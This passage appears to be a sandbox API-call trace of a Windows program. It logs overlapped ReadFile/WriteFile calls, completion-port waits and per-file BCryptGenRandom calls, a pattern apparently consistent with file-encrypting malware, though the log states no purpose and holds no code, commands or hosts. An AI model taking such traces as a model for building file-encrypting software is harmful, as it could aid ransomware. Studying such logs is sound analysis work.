CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0210.173] WriteFile (in: hFile=0xec, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x770, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0210.173] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0210.185] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0210.186] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0210.186] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0210.186] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0210.186] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0210.186] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0210.187] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0210.187] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0210.187] free (_Block=0x3e305b8) [0210.187] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0210.187] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0210.187] free (_Block=0x1fa91d0) [0210.187] free (_Block=0x77d7a8) [0210.187] free (_Block=0x1fa90b8) [0210.187] WriteFile (in: hFile=0x2a8, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x613, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0210.187] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0210.191] CloseHandle (hObject=0x338) returned 1 [0210.194] free (_Block=0x3e70008) [0210.195] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0210.234] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0210.234] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0210.234] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0210.234] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0210.235] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0210.235] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0210.235] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0210.235] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0210.235] free (_Block=0x3e305b8) [0210.235] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0210.235] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0210.236] free (_Block=0x1fa91d0) [0210.236] free (_Block=0x77d7a8) [0210.236] free (_Block=0x1fa90b8) [0210.236] WriteFile (in: hFile=0x338, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0210.236] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0210.265] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0210.265] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0210.265] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0210.265] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0210.266] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0210.266] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0210.266] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0210.266] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0210.266] free (_Block=0x3e305b8) [0210.266] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0210.266] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0210.267] free (_Block=0x1fa91d0) [0210.267] free (_Block=0x1fa2ed8) [0210.267] free (_Block=0x1fa90b8) [0210.267] WriteFile (in: hFile=0xec, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0210.267] GetQueuedCompletionStatus (CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff) Thread: id = 14 os_tid = 0x8e4 [0069.071] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0076.956] CloseHandle (hObject=0x3a0) returned 1 [0076.960] free (_Block=0x1ff1e60) [0076.960] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0076.968] WriteFile (in: hFile=0x3ac, lpBuffer=0x1fb18f4, nNumberOfBytesToWrite=0xce00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 0x0 [0076.969] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0076.981] ReadFile (in: hFile=0x3b4, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0x30e4, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 0x0 [0076.995] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0077.152] CloseHandle (hObject=0x3b4) returned 1 [0077.152] free (_Block=0x1fb18c0) [0077.152] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0077.159] WriteFile (in: hFile=0x3a0, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x2e60, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0077.159] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0077.160] CloseHandle (hObject=0x3ac) returned 1 [0077.160] free (_Block=0x3d70048) [0077.160] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0077.161] CloseHandle (hObject=0x3b8) returned 1 [0077.161] free (_Block=0x2031ed0) [0077.164] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0077.640] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0077.641] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0077.641] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0077.641] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0077.641] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0077.641] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0077.642] calloc (_Count=0x40, _Size=0x4) returned 0x1ff1e60 [0077.642] calloc (_Count=0x41, _Size=0x4) returned 0x77d800 [0077.642] free (_Block=0x1ff1e60) [0077.642] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1e60 [0077.642] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1930 [0077.642] free (_Block=0x1ff1e60) [0077.642] free (_Block=0x1ff1930) [0077.642] free (_Block=0x77d800) [0077.642] WriteFile (in: hFile=0x3b8, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x613, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0077.643] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0077.682] CloseHandle (hObject=0x3b8) returned 1 [0077.682] free (_Block=0x1fb18c0) [0077.682] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0077.690] ReadFile (in: hFile=0x3a0, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0077.694] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0079.134] ReadFile (in: hFile=0x3a0, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0x1c9de, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 0x0 [0079.136] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0079.159] CloseHandle (hObject=0x3bc) returned 1 [0079.159] free (_Block=0x1fb18c0) [0079.160] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0079.190] ReadFile (in: hFile=0x3b8, lpBuffer=0x2031f04, nNumberOfBytesToRead=0x2666c, lpNumberOfBytesRead=0x0, lpOverlapped=0x2031ed0 | out: lpBuffer=0x2031f04, lpNumberOfBytesRead=0x0, lpOverlapped=0x2031ed0) returned 0x0 [0079.205] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0079.223] WriteFile (in: hFile=0x3c0, lpBuffer=0x3db00ec*, nNumberOfBytesToWrite=0x26670, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3db00b8 | out: lpBuffer=0x3db00ec*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3db00b8) returned 1 [0079.224] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0079.253] ReadFile (in: hFile=0x3a0, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0x2472c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 0x0 [0079.260] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0079.262] WriteFile (in: hFile=0x3ac, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0079.262] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0079.271] WriteFile (in: hFile=0x3bc, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x1e970, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0079.272] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0079.300] ReadFile (in: hFile=0x3c4, lpBuffer=0x3df015c, nNumberOfBytesToRead=0xb6a, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0128 | out: lpBuffer=0x3df015c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0128) returned 1 [0079.300] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0079.301] CloseHandle (hObject=0x3c4) returned 1 [0079.304] free (_Block=0x3df0128) [0079.304] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0079.340] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0079.341] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0079.341] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0079.341] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0079.341] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0079.341] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0079.341] calloc (_Count=0x40, _Size=0x4) returned 0x1ff1e60 [0079.341] calloc (_Count=0x41, _Size=0x4) returned 0x77d800 [0079.342] free (_Block=0x1ff1e60) [0079.342] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1e60 [0079.342] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1930 [0079.342] free (_Block=0x1ff1e60) [0079.342] free (_Block=0x1ff1930) [0079.342] free (_Block=0x77d800) [0079.342] WriteFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x61d, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0079.342] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0079.343] WriteFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0xf70, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0079.343] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0079.357] ReadFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x1197, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0079.358] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0079.358] CloseHandle (hObject=0x3c4) returned 1 [0079.365] free (_Block=0x1fb18c0) [0079.365] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0079.373] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0079.374] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0079.374] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0079.374] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0079.374] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0079.374] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0079.375] calloc (_Count=0x40, _Size=0x4) returned 0x1ff1e60 [0079.375] calloc (_Count=0x41, _Size=0x4) returned 0x77d800 [0079.375] free (_Block=0x1ff1e60) [0079.375] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1e60 [0079.375] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1930 [0079.375] free (_Block=0x1ff1e60) [0079.375] free (_Block=0x1ff1930) [0079.375] free (_Block=0x77d800) [0079.375] WriteFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x61d, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0079.376] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0079.376] WriteFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x11b0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0079.377] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0079.388] ReadFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x1068, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0079.389] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0079.389] CloseHandle (hObject=0x3c4) returned 1 [0079.390] free (_Block=0x1fb18c0) [0079.390] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0079.402] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0079.402] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0079.402] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0079.402] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0079.402] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0079.402] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x322f970) returned 0x0 [0079.403] calloc (_Count=0x40, _Size=0x4) returned 0x1ff1e60 [0079.403] calloc (_Count=0x41, _Size=0x4) returned 0x77d800 [0079.403] free (_Block=0x1ff1e60) [0079.403] calloc (_Count=0x41, _Size=0x4) returned 0x1ff1e60 [0079.403] calloc (_Count=0x82, _Size=0x4) returned 0x1ff1930 [0079.403] free (_Block=0x1ff1e60) [0079.403] free (_Block=0x1ff1930) [0079.403] free (_Block=0x77d800) [0079.403] WriteFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0x61d, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0079.403] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0079.404] WriteFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4*, nNumberOfBytesToWrite=0xac0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1fb18c0) returned 1 [0079.404] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0079.421] ReadFile (in: hFile=0x3c4, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x8a3, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0079.421] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0079.421] CloseHandle (hObject=0x3c4) returned 1 [0079.426] free (_Block=0x1fb18c0) [0079.426] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x322fc0c, lpCompletionKey=0x322fc1c, lpOverlapped=0x322fc18) returned 1 [0079.436] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0079.436] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0079.436] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x322fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x322fc30) returned 0x0 [0079.436] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0079.437] GetProcAddress 